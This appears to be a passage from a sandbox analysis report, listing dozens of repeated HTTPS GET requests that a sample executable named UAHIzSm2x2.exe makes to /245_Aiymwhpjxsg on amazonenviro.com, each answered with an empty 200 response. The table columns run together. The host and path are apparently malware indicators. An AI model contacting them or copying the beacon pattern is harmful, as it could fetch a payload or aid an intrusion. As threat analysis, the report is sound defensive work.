                    20192.168.2.650010166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:50 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:51 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:50 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.650027166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:52 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:53 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:52 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.650029166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:54 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:54 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:54 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.650031166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:56 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:56 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:56 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.650033166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:58 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:58 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:58 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.650035166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:00 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:00 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:00 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.650038166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:02 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:02 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:02 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.650040166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:04 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:04 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:04 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.650042166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:06 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:06 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:06 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.650044166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:08 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:08 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:08 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.650046166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:10 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:10 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:10 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.650048166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:11 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:12 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:12 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.650050166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:13 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:14 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:14 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.650052166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:15 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:16 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:16 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.650055166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:17 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:18 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:18 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.650057166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:19 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:20 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:20 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.650059166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:21 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:22 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:22 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.650061166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:23 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:24 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:24 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.650063166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:25 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:26 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:26 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.650065166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:27 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:28 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:27 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.650067166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:29 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:30 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:29 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    41192.168.2.650069166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:31 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:32 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:31 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    42192.168.2.650071166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:33 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:34 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:33 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    43192.168.2.650073166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:35 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:35 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:35 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    44192.168.2.650075166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:37 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:37 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:37 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    45192.168.2.650077166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:39 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:39 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:39 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    46192.168.2.650079166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:41 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:41 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:41 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    47192.168.2.650081166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:43 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:43 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:43 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    48192.168.2.650083166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:44 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:45 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:45 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    49192.168.2.650085166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:46 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:47 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:47 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    50192.168.2.650087166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:48 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:49 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:49 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    51192.168.2.650090166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:50 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:51 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:51 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    52192.168.2.650092166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:52 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:53 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:53 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    53192.168.2.650094166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:54 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:55 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:54 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    54192.168.2.650096166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:56 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:56 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:56 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    55192.168.2.650098166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:25:58 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:58 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:58 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    56192.168.2.650100166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:26:00 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:26:00 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:26:00 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    57192.168.2.650102166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:26:02 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:26:02 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:26:02 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
